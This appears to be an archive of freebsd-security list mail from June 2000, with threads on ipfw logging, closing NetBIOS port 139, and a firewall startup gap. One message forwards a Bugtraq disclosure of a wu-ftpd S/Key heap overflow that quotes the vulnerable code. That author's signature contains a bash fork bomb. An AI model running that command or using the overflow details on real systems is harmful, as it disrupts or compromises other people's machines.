something like > > !ipfw > *.* /var/log/ipfw.log > > then you need to touch /var/log/ipfw.log so that it exists. It won't be > able to write to the log if the file isn't there. > > You then need to write the rule you want to log with the 'log' command. > > ie > > ipfw add 1400 deny log tcp from any to any 1-1024 via ed0 > > which it looks like you already do. > > > Short answer: > Change your limit and ensure you have the log file set up correctly. Let > me know if you still can't get it logging and I'll try to help. > > > Scott E. Campbell > _______________________________ > Computer Operations > Greater Victoria Public Library > Victoria BC CANADA > > (250)382-7241 x230 > scampbel@gvpl.victoria.bc.ca > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 5:22:21 2000 Delivered-To: freebsd-security@freebsd.org Received: from burka.carrier.kiev.ua (burka.carrier.kiev.ua [193.193.193.107]) by hub.freebsd.org (Postfix) with ESMTP id 6BAC437B9B5 for ; Tue, 13 Jun 2000 05:22:14 -0700 (PDT) (envelope-from netch@lucky.net) Received: from netch@localhost by burka.carrier.kiev.ua id PIN69101 for freebsd-security@freebsd.org; Tue, 13 Jun 2000 15:22:11 +0300 (EEST) (envelope-from netch) Date: Tue, 13 Jun 2000 15:22:11 +0300 From: Valentin Nechayev To: freebsd-security@freebsd.org Subject: O_NOFOLLOW Message-ID: <20000613152211.B42067@lucky.net> Reply-To: netch@lucky.net Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii X-Mailer: Mutt 1.0i X-42: On Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org O_NOFOLLOW flag for open() syscall exists since 3.0-CURRENT and is quite useful for secure open, but is not documented in open(2) man page yet. Do FreeBSD team have its disclosing in plans? -- NVA To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 6: 0:55 2000 Delivered-To: freebsd-security@freebsd.org Received: from MCSMTP.MC.VANDERBILT.EDU (mcsmtp.mc.Vanderbilt.Edu [160.129.93.202]) by hub.freebsd.org (Postfix) with SMTP id 0B7BF37BE05 for ; Tue, 13 Jun 2000 06:00:51 -0700 (PDT) (envelope-from George.Giles@mcmail.vanderbilt.edu) Received: by MCSMTP.MC.VANDERBILT.EDU(Lotus SMTP MTA v4.6.6 (890.1 7-16-1999)) id 862568FD.0046A2AE ; Tue, 13 Jun 2000 07:51:31 -0500 X-Lotus-FromDomain: VANDERBILT From: George.Giles@mcmail.vanderbilt.edu To: freebsd-security@freebsd.org Message-ID: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU> Date: Tue, 13 Jun 2000 07:58:30 -0500 Subject: netbios Mime-Version: 1.0 Content-type: text/plain; charset=us-ascii Content-Disposition: inline Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have closed all ports except 21, 22 using ipfw. I find on scanning a port 139 open called NETBIOS. How do I close? Please advise, George To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 7: 6:22 2000 Delivered-To: freebsd-security@freebsd.org Received: from nova.kvalito.no (nova.kvalito.no [194.29.202.67]) by hub.freebsd.org (Postfix) with ESMTP id 7A64037C01B for ; Tue, 13 Jun 2000 07:06:13 -0700 (PDT) (envelope-from Harald@Kvalito.no) Received: by nova.kvalito.no with Internet Mail Service (5.5.2448.0) id ; Tue, 13 Jun 2000 16:07:22 +0200 Message-ID: From: Harald Haugnes To: "'George.Giles@mcmail.vanderbilt.edu'" , freebsd-security@freebsd.org Subject: RE: netbios Date: Tue, 13 Jun 2000 16:07:20 +0200 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2448.0) Content-Type: text/plain; charset="Windows-1252" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org what if you looked in your inetd.conf? you should be able to disable it from there. ----------------------------------------------------- Sincerly, Harald Haugnes ----------------------------------------------------- Kvalito IT AS Tlf: 73 54 64 80 Pb. 1238 Fax: 73 54 64 76 7462 Trondheim http://www.kvalito.no/ Konto nr 8601.05.43942 ----------------------------------------------------- Hi! I'm a .signature virus! cp me into your .signature file to help me spread! ----------------------------------------------------- > -----Original Message----- > From: George.Giles@mcmail.vanderbilt.edu > [mailto:George.Giles@mcmail.vanderbilt.edu] > Sent: 13. juni 2000 14:59 > To: freebsd-security@freebsd.org > Subject: netbios > > > > > I have closed all ports except 21, 22 using ipfw. I find on > scanning a port 139 > open called NETBIOS. How do I close? > > Please advise, > > George > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 9:49:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from mail.rdc1.sdca.home.com (ha1.rdc1.sdca.home.com [24.0.3.66]) by hub.freebsd.org (Postfix) with ESMTP id 9F48437B8F4 for ; Tue, 13 Jun 2000 09:49:08 -0700 (PDT) (envelope-from larry@interactivate.com) Received: from interactivate.com ([24.15.133.36]) by mail.rdc1.sdca.home.com (InterMail vM.4.01.02.00 201-229-116) with ESMTP id <20000613164908.MCFL28251.mail.rdc1.sdca.home.com@interactivate.com>; Tue, 13 Jun 2000 09:49:08 -0700 Message-ID: <39466731.3C2890C@interactivate.com> Date: Tue, 13 Jun 2000 09:54:09 -0700 From: Lawrence Sica Organization: Interactivate, Inc X-Mailer: Mozilla 4.73 [en] (Win98; I) X-Accept-Language: en MIME-Version: 1.0 To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@FreeBSD.ORG Subject: Re: netbios References: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org George.Giles@mcmail.vanderbilt.edu wrote: > > I have closed all ports except 21, 22 using ipfw. I find on scanning a port 139 > open called NETBIOS. How do I close? > > Please advise, > well if you closed the ithers then do it the same way. you'll want to close ports 137-139 though. ipfw add deny tcp from any to 137-139 That is a quick simple way to do it. You should also man ipfw for all the information on ipfw though. Are there windows machines connecting to that box? If so it is most likely that, otherwise it may be someone looking for windows boxes. --Larry To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 10:40:39 2000 Delivered-To: freebsd-security@freebsd.org Received: from saturn.terahertz.net (saturn.terahertz.net [216.165.129.80]) by hub.freebsd.org (Postfix) with ESMTP id 289A437B6F7 for ; Tue, 13 Jun 2000 10:40:32 -0700 (PDT) (envelope-from sideshow@terahertz.net) Received: from localhost (sideshow@localhost) by saturn.terahertz.net (8.9.3/8.9.3) with ESMTP id MAA30031; Tue, 13 Jun 2000 12:33:56 -0500 (CDT) Date: Tue, 13 Jun 2000 12:33:56 -0500 (CDT) From: Matt Watson To: Harald Haugnes Cc: "'George.Giles@mcmail.vanderbilt.edu'" , freebsd-security@FreeBSD.ORG Subject: RE: netbios In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org NetBIOS should only be open if your running samba. Incase you don't know NetBIOS is a part of windows' (at least its mostly used with windows) network communication protocol for filesharing and printer sharing etc. You should be able to see the daemon running as 'nmbd' and 'smbd' you'll want to kill both of them. However its obviously being started at bootup time in your case, i'm not sure where freebsd would keep the startup for samba, probably /etc/rc.conf or /etc/rc.local. If you don't find samba running i don't know whjat else it would be... i've never seen anything but samba use it. You could find out using 'sockstat'. -- Matt Watson TeraHertz Communications On Tue, 13 Jun 2000, Harald Haugnes wrote: > what if you looked in your inetd.conf? > you should be able to disable it from there. > > ----------------------------------------------------- > Sincerly, > Harald Haugnes > ----------------------------------------------------- > Kvalito IT AS Tlf: 73 54 64 80 > Pb. 1238 Fax: 73 54 64 76 > 7462 Trondheim > > http://www.kvalito.no/ > Konto nr 8601.05.43942 > ----------------------------------------------------- > Hi! I'm a .signature virus! > cp me into your .signature file to help me spread! > ----------------------------------------------------- > > > -----Original Message----- > > From: George.Giles@mcmail.vanderbilt.edu > > [mailto:George.Giles@mcmail.vanderbilt.edu] > > Sent: 13. juni 2000 14:59 > > To: freebsd-security@freebsd.org > > Subject: netbios > > > > > > > > > > I have closed all ports except 21, 22 using ipfw. I find on > > scanning a port 139 > > open called NETBIOS. How do I close? > > > > Please advise, > > > > George > > > > > > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > > with "unsubscribe freebsd-security" in the body of the message > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 10:46:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id 2EB9937B6F7 for ; Tue, 13 Jun 2000 10:46:31 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id TAA18338; Tue, 13 Jun 2000 19:46:43 +0200 (MET DST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 131ulQ-0004mp-00 for ; Tue, 13 Jun 2000 19:46:12 +0200 Date: Tue, 13 Jun 2000 19:46:12 +0200 From: Szilveszter Adam To: freebsd-security@FreeBSD.ORG Subject: Re: netbios Message-ID: <20000613194612.B16541@petra.hos.u-szeged.hu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0.1i In-Reply-To: ; from sideshow@terahertz.net on Tue, Jun 13, 2000 at 12:33:56PM -0500 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jun 13, 2000 at 12:33:56PM -0500, Matt Watson wrote: > NetBIOS should only be open if your running samba. Incase you don't know > NetBIOS is a part of windows' (at least its mostly used with > windows) network communication protocol for filesharing and printer > sharing etc. You should be able to see the daemon running as 'nmbd' and > 'smbd' you'll want to kill both of them. However its obviously being > started at bootup time in your case, i'm not sure where freebsd would keep > the startup for samba, probably /etc/rc.conf or /etc/rc.local. If you > don't find samba running i don't know whjat else it would be... i've never > seen anything but samba use it. You could find out using 'sockstat'. Startup scripts for programs installed from ports (and Samba is such a program) can be found in /usr/local/etc/rc.d/ and are named like .sh. You want to delete or rename it for it not to run at startup. -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 10:54:56 2000 Delivered-To: freebsd-security@freebsd.org Received: from majordomo2.umd.edu (majordomo2.umd.edu [128.8.10.7]) by hub.freebsd.org (Postfix) with ESMTP id CADC037BF79 for ; Tue, 13 Jun 2000 10:54:49 -0700 (PDT) (envelope-from gollucci@wam.umd.edu) Received: from rac9.wam.umd.edu (root@rac9.wam.umd.edu [128.8.10.149]) by majordomo2.umd.edu (8.9.3/8.9.3) with ESMTP id NAA22189; Tue, 13 Jun 2000 13:54:44 -0400 (EDT) Received: from rac9.wam.umd.edu (sendmail@localhost [127.0.0.1]) by rac9.wam.umd.edu (8.9.3/8.9.3) with SMTP id NAA01714; Tue, 13 Jun 2000 13:54:45 -0400 (EDT) Received: from localhost (gollucci@localhost) by rac9.wam.umd.edu (8.9.3/8.9.3) with ESMTP id NAA01709; Tue, 13 Jun 2000 13:54:45 -0400 (EDT) X-Authentication-Warning: rac9.wam.umd.edu: gollucci owned process doing -bs Date: Tue, 13 Jun 2000 13:54:45 -0400 (EDT) From: "Philip M. Gollucci" To: George.Giles@mcmail.vanderbilt.edu Cc: freebsd-security@FreeBSD.ORG Subject: Re: netbios In-Reply-To: <862568FD.0046A112.00@MCSMTP.MC.VANDERBILT.EDU> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org check your inetd.conf file... if your running samba it should be open other wise no.. On Tue, 13 Jun 2000 George.Giles@mcmail.vanderbilt.edu wrote: > > > I have closed all ports except 21, 22 using ipfw. I find on scanning a port 139 > open called NETBIOS. How do I close? > > Please advise, > > George > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 10:57:43 2000 Delivered-To: freebsd-security@freebsd.org Received: from saturn.terahertz.net (saturn.terahertz.net [216.165.129.80]) by hub.freebsd.org (Postfix) with ESMTP id 5C1FD37C19C for ; Tue, 13 Jun 2000 10:57:36 -0700 (PDT) (envelope-from sideshow@terahertz.net) Received: from localhost (sideshow@localhost) by saturn.terahertz.net (8.9.3/8.9.3) with ESMTP id MAA32013; Tue, 13 Jun 2000 12:51:07 -0500 (CDT) Date: Tue, 13 Jun 2000 12:51:06 -0500 (CDT) From: Matt Watson To: Szilveszter Adam Cc: freebsd-security@FreeBSD.ORG Subject: Re: netbios In-Reply-To: <20000613194612.B16541@petra.hos.u-szeged.hu> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Ah, now i know for next time =) -- Matt Watson TeraHertz Communications On Tue, 13 Jun 2000, Szilveszter Adam wrote: > On Tue, Jun 13, 2000 at 12:33:56PM -0500, Matt Watson wrote: > > NetBIOS should only be open if your running samba. Incase you don't know > > NetBIOS is a part of windows' (at least its mostly used with > > windows) network communication protocol for filesharing and printer > > sharing etc. You should be able to see the daemon running as 'nmbd' and > > 'smbd' you'll want to kill both of them. However its obviously being > > started at bootup time in your case, i'm not sure where freebsd would keep > > the startup for samba, probably /etc/rc.conf or /etc/rc.local. If you > > don't find samba running i don't know whjat else it would be... i've never > > seen anything but samba use it. You could find out using 'sockstat'. > > Startup scripts for programs installed from ports (and Samba is such a > program) can be found in /usr/local/etc/rc.d/ and are named like > .sh. You want to delete or rename it for it not to run at startup. > > -- > Regards: > > Szilveszter ADAM > Szeged University > Szeged Hungary > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 10:59:13 2000 Delivered-To: freebsd-security@freebsd.org Received: from blort.org (blort.org [206.157.137.192]) by hub.freebsd.org (Postfix) with ESMTP id AD8B337B72D for ; Tue, 13 Jun 2000 10:59:03 -0700 (PDT) (envelope-from kgasso@blort.org) Received: from localhost (kgasso@localhost) by blort.org (8.9.1a/8.8.7) with ESMTP id KAA12610; Tue, 13 Jun 2000 10:58:47 -0700 Date: Tue, 13 Jun 2000 10:58:47 -0700 (PDT) From: Kameron Gasso To: Szilveszter Adam Cc: freebsd-security@FreeBSD.ORG Subject: Re: netbios In-Reply-To: <20000613194612.B16541@petra.hos.u-szeged.hu> Message-ID: X-Authentication-Warning: ookblat.blort.org: kgasso flogged sendmail with a hard bagel. X-Wibbler: Pine 4.20 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 13 Jun 2000, Szilveszter Adam wrote: > On Tue, Jun 13, 2000 at 12:33:56PM -0500, Matt Watson wrote: > > NetBIOS should only be open if your running samba. Incase you don't know > > NetBIOS is a part of windows' (at least its mostly used with > > windows) network communication protocol for filesharing and printer > > sharing etc. You should be able to see the daemon running as 'nmbd' and > > 'smbd' you'll want to kill both of them. However its obviously being > > started at bootup time in your case, i'm not sure where freebsd would keep > > the startup for samba, probably /etc/rc.conf or /etc/rc.local. If you > > don't find samba running i don't know whjat else it would be... i've never > > seen anything but samba use it. You could find out using 'sockstat'. > > Startup scripts for programs installed from ports (and Samba is such a > program) can be found in /usr/local/etc/rc.d/ and are named like > .sh. You want to delete or rename it for it not to run at startup. > smbd/nmbd have their own inetd.conf entries in 4.0-RELEASE: wibbly# grep "mbd" * inetd.conf:#netbios-ssn stream tcp nowait root /usr/local/sbin/smbd smbd inetd.conf:#netbios-ns dgram udp wait root /usr/local/sbin/nmbd nmbd I also see nothing else regarding the two in /etc, /etc/defaults, or the like. checking on my 3.4-RELEASE box, results are the same. Cheers, -Kameron (kgasso@blort.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 11:13:18 2000 Delivered-To: freebsd-security@freebsd.org Received: from saturn.terahertz.net (saturn.terahertz.net [216.165.129.80]) by hub.freebsd.org (Postfix) with ESMTP id B82DB37B92B for ; Tue, 13 Jun 2000 11:13:12 -0700 (PDT) (envelope-from sideshow@terahertz.net) Received: from localhost (sideshow@localhost) by saturn.terahertz.net (8.9.3/8.9.3) with ESMTP id NAA33625; Tue, 13 Jun 2000 13:06:41 -0500 (CDT) Date: Tue, 13 Jun 2000 13:06:41 -0500 (CDT) From: Matt Watson To: Kameron Gasso Cc: Szilveszter Adam , freebsd-security@FreeBSD.ORG Subject: Re: netbios In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Kameron, actually see if they are already running in the background, nmbd and smbd generally run as daemons and not from inetd.conf. -- Matt Watson TeraHertz Communications On Tue, 13 Jun 2000, Kameron Gasso wrote: > On Tue, 13 Jun 2000, Szilveszter Adam wrote: > > On Tue, Jun 13, 2000 at 12:33:56PM -0500, Matt Watson wrote: > > > NetBIOS should only be open if your running samba. Incase you don't know > > > NetBIOS is a part of windows' (at least its mostly used with > > > windows) network communication protocol for filesharing and printer > > > sharing etc. You should be able to see the daemon running as 'nmbd' and > > > 'smbd' you'll want to kill both of them. However its obviously being > > > started at bootup time in your case, i'm not sure where freebsd would keep > > > the startup for samba, probably /etc/rc.conf or /etc/rc.local. If you > > > don't find samba running i don't know whjat else it would be... i've never > > > seen anything but samba use it. You could find out using 'sockstat'. > > > > Startup scripts for programs installed from ports (and Samba is such a > > program) can be found in /usr/local/etc/rc.d/ and are named like > > .sh. You want to delete or rename it for it not to run at startup. > > > smbd/nmbd have their own inetd.conf entries in 4.0-RELEASE: > > wibbly# grep "mbd" * > inetd.conf:#netbios-ssn stream tcp nowait root /usr/local/sbin/smbd smbd > inetd.conf:#netbios-ns dgram udp wait root /usr/local/sbin/nmbd nmbd > > I also see nothing else regarding the two in /etc, /etc/defaults, or the > like. > > checking on my 3.4-RELEASE box, results are the same. > > Cheers, > > -Kameron > (kgasso@blort.org) > > > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe freebsd-security" in the body of the message > To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 11:19:10 2000 Delivered-To: freebsd-security@freebsd.org Received: from blort.org (blort.org [206.157.137.192]) by hub.freebsd.org (Postfix) with ESMTP id 4A72A37BFAE for ; Tue, 13 Jun 2000 11:19:06 -0700 (PDT) (envelope-from kgasso@blort.org) Received: from localhost (kgasso@localhost) by blort.org (8.9.1a/8.8.7) with ESMTP id LAA12665; Tue, 13 Jun 2000 11:18:49 -0700 Date: Tue, 13 Jun 2000 11:18:48 -0700 (PDT) From: Kameron Gasso To: Matt Watson Cc: Szilveszter Adam , freebsd-security@FreeBSD.ORG Subject: Re: netbios In-Reply-To: Message-ID: X-Authentication-Warning: ookblat.blort.org: kgasso flogged sendmail with a hard bagel. X-Wibbler: Pine 4.20 MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, 13 Jun 2000, Matt Watson wrote: > Kameron, actually see if they are already running in the background, nmbd > and smbd generally run as daemons and not from inetd.conf. Nope, neither running in bg. Suppose it would vary per version of Samba, I recall that when I played with Redhat Linux (blah), it does start smbd/nmbd in daemon mode and other versions I've used start both from inetd. Cheers, -Kameron (kgasso@blort.org) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 11:45:27 2000 Delivered-To: freebsd-security@freebsd.org Received: from sol.cc.u-szeged.hu (sol.cc.u-szeged.hu [160.114.8.24]) by hub.freebsd.org (Postfix) with ESMTP id F342F37C098 for ; Tue, 13 Jun 2000 11:45:21 -0700 (PDT) (envelope-from sziszi@petra.hos.u-szeged.hu) Received: from petra.hos.u-szeged.hu by sol.cc.u-szeged.hu (8.9.3+Sun/SMI-SVR4) id UAA21717; Tue, 13 Jun 2000 20:45:49 +0200 (MET DST) Received: from sziszi by petra.hos.u-szeged.hu with local (Exim 3.12 #1 (Debian)) id 131vgd-00053W-00 for ; Tue, 13 Jun 2000 20:45:19 +0200 Date: Tue, 13 Jun 2000 20:45:19 +0200 From: Szilveszter Adam To: freebsd-security@FreeBSD.ORG Subject: Re: netbios Message-ID: <20000613204519.A19343@petra.hos.u-szeged.hu> Mail-Followup-To: freebsd-security@FreeBSD.ORG References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii User-Agent: Mutt/1.0.1i In-Reply-To: ; from kgasso@blort.org on Tue, Jun 13, 2000 at 11:18:48AM -0700 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Tue, Jun 13, 2000 at 11:18:48AM -0700, Kameron Gasso wrote: > On Tue, 13 Jun 2000, Matt Watson wrote: > > Kameron, actually see if they are already running in the background, nmbd > > and smbd generally run as daemons and not from inetd.conf. > > Nope, neither running in bg. Suppose it would vary per version of Samba, > I recall that when I played with Redhat Linux (blah), it does start > smbd/nmbd in daemon mode and other versions I've used start both from inetd. On the Linux box I have access to (Debian 2.2) there is actually a choice: you can run samba either way. I do not know which is the default because the sysadmin may have edited the configuration files, but the startup script checks if Samba is run from inetd or not. I do not know what is the default on FreeBSD, either. I do not have samba installed and consequently I do not have the netbios port open, either. If you are sure you are not running samba now, you could use eg lsof from ports to find out what file (if any) is actually using the network socket. -- Regards: Szilveszter ADAM Szeged University Szeged Hungary To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 12:26:53 2000 Delivered-To: freebsd-security@freebsd.org Received: from ouch.Oof.NET (ouch.Oof.NET [207.99.30.50]) by hub.freebsd.org (Postfix) with ESMTP id 7C8E437C0AF for ; Tue, 13 Jun 2000 12:26:47 -0700 (PDT) (envelope-from freebsd-contact@research.poc.net) Received: from localhost (ash@localhost) by ouch.Oof.NET (POCmail) with ESMTP id PAA76489; Tue, 13 Jun 2000 15:26:45 -0400 (EDT) Date: Tue, 13 Jun 2000 15:26:45 -0400 (EDT) From: To: freebsd-security@freebsd.org Subject: rc.network firewall init Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I've noticed that FreeBSD 4.0's /etc/rc.network brings up network interfaces before initializing firewall behavior. In the case of IPFIREWALL, when not compiled into the kernel, this causes a short window of 'exposure' during startup. In the time between network connectivity being established, and the IPFIREWALL KLD being loaded, all interfaces are up and unfiltered. (An almost identical problem exists even when IPFIREWALL *is* compiled into the kernel, but the kernel option IPFIREWALL_DEFAULT_TO_ACCEPT is specified.) One successful TCP handshake during this window can establish a connection that survives the firewall loading, due to IPFIREWALL's non-statefulness and the (resultant) commonality of "allow tcp from any to any established". --Anatole Shaw To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 15:10: 8 2000 Delivered-To: freebsd-security@freebsd.org Received: from giganda.komkon.org (giganda.komkon.org [209.125.17.66]) by hub.freebsd.org (Postfix) with ESMTP id 48A9A37BFF3 for ; Tue, 13 Jun 2000 15:10:04 -0700 (PDT) (envelope-from str@giganda.komkon.org) Received: (from str@localhost) by giganda.komkon.org (8.9.3/8.9.3) id SAA61771 for security@freebsd.org; Tue, 13 Jun 2000 18:10:02 -0400 (EDT) Date: Tue, 13 Jun 2000 18:10:02 -0400 (EDT) From: Igor Roshchin Message-Id: <200006132210.SAA61771@giganda.komkon.org> To: security@freebsd.org Subject: wu-ftpd vulnerability - is FreeBSD's port vulnerable ? Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Since nothing about this vulnerability appeared on -security list, nor any changes were made since this posting, I wonder if the FreeBSD port of wu-ftpd vulnerable, (and forwarding this just in case it was not noticed). Regards, Igor ----- Forwarded message from Automatic digest processor ----- From owner-BUGTRAQ@LISTS.SECURITYFOCUS.COM Fri Jun 9 03:02:56 2000 Date: Fri, 9 Jun 2000 00:00:09 -0700 Reply-To: Bugtraq List Sender: Bugtraq List From: Automatic digest processor Subject: BUGTRAQ Digest - 7 Jun 2000 to 8 Jun 2000 (#2000-127) To: Recipients of BUGTRAQ digests Message-Id: <20000609070011.8F28F1EF0E@lists.securityfocus.com> <..skip..> -- Start of included mail From: Michal Zalewski Date: Wed, 7 Jun 2000 13:40:26 +0200 Subject: Yet another heap overflow in wu-ftpd and so on... This is result of my 20 minutes long mini-audit of wu-ftpd 2.6.0 source code. I won't spend my time analysing source code nor doing any debugging. I simply issued command like: grep -nE 'sprintf.*\%s|strcat|strcpy' *.c Gosh... Not even thinking about many, many other dangerous functions and mechanisms. Results? Yes, some: 1. heap overflow in S/Key authorization mechanism ------------------------------------------------- The problem affects wu-ftpd installations with S/Key support enabled. In fact, this mechanism, instead of increasing site security, results in buffer overflow in the time of user login on some machines. What is the problem? Well... -- ftpd.c -- #if defined(SKEY) && !defined(__NetBSD__) [...] /* skey_challenge - additional password prompt stuff */ char *skey_challenge(char *name, struct passwd *pwd, int pwok) { static char buf[128]; char sbuf[40]; struct skey skey; /* Display s/key challenge where appropriate. */ if (pwd == NULL || skeychallenge(&skey, pwd->pw_name, sbuf)) sprintf(buf, "Password required for %s.", name); else sprintf(buf, "%s %s for %s.", sbuf, pwok ? "allowed" : "required", name); return (buf); } #endif -- EOF -- Well... Buffer (buf, size = 128 bytes) is placed on heap, and I'm not sure it could be exploited any way (read: if there is any important data on the heap at the time of authorization, or any data processed later with assumption it will be zeroed - could be, I guess). Aah, an example?;): USER ;) No, no SEGV or crash, simply overwritten piece of memory. Some debugging would be nice. The problem does NOT affect systems without S/Key support compiled into ftpd and does NOT affect NetBSD libskey (see #ifdefs). 2. i guess you'll be able to find it by yourself, so... ------------------------------------------------------- More? Probably I'll be killed ;) but I guess almost anyone who issued similar command as above 'grep' can see it clearly. It's rather obvious that there's an overflow in optional feature introduced in recent wu-ftpd versions, called 'internal ls'. But this problem has been discovered by someone else (I'm not sure who did it, someone from teso or Lam3rZ) days ago. Sorry, anyway :) _______________________________________________________ Michal Zalewski [lcamtuf@tpi.pl] [tp.internet/security] [http://lcamtuf.na.export.pl] <=--=> bash$ :(){ :|:&};: =-----=> God is real, unless declared integer. <=-----= -- End of included mail. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Jun 13 15:27:35 2000 Delivered-To: freebsd-security@freebsd.org Received: from ns1.websitefactory.net (ns1.websitefactory.net [208.26.83.130]) by hub.freebsd.org (Postfix) with ESMTP id 0EC3637C0DB for ; Tue, 13 Jun 2000 15:27:28 -0700 (PDT) (envelope-from ) Received: from kevlar.websitefactory.net (kevlar.websitefactory.net [208.26.78.15]) by ns1.websitefactory.net (Postfix) with ESMTP id 25431AE800; Tue, 13 Jun 2000 18:28:23 -0400 (EDT) X-Sieve: cmu-sieve 1.3 Received: from lists.securityfocus.com (lists.securityfocus.com [207.126.127.68]) by ns1.websitefactory.net (Postfix) with ESMTP id ADB3FAE7E1 for ; Fri, 2 Jun 2000 17:29:41 -0400 (EDT) Received: from lists.securityfocus.com (lists.securityfocus.com [207.126.127.68]) by lists.securityfocus.com (Postfix) with ESMTP id B5F231F765; Fri, 2 Jun 2000 13:05:11 -0700 (PDT) Received: from LISTS.SECURITYFOCUS.COM by LISTS.SECURITYFOCUS.COM (LISTSERV-TCP/IP release 1.8d) with spool id 10313163 for BUGTRAQ@LISTS.SECURITYFOCUS.COM; Fri, 2 Jun 2000 13:04:20 -0700 Approved-By: aleph1@SECURITYFOCUS.COM Delivered-To: bugtraq@lists.securityfocus.com Received: from securityfocus.com (mail.securityfocus.com [207.126.127.78]) by lists.securityfocus.com (Postfix) with SMTP id D12531F055 for ; Fri, 2 Jun 2000 04:44:48 -0700 (PDT) Received: (qmail 18033 invoked by alias); 2 Jun 2000 11:44:56 -0000 Delivered-To: bugtraq@securityfocus.com Received: (qmail 18029 invoked from network); 2 Jun 2000 11:44:49 -0000 Received: from userd54.wide.net.ar (HELO gutenberg.ussrback.net) (200.49.76.54) by mail.securityfocus.com with SMTP; 2 Jun 2000 11:44:49 -0000 Received: from luck (luck@luck.ussrback.net [192.168.0.3]) by gutenberg.ussrback.net (8.9.3/8.9.3) with SMTP id IAA00719 for ; Fri, 2 Jun 2000 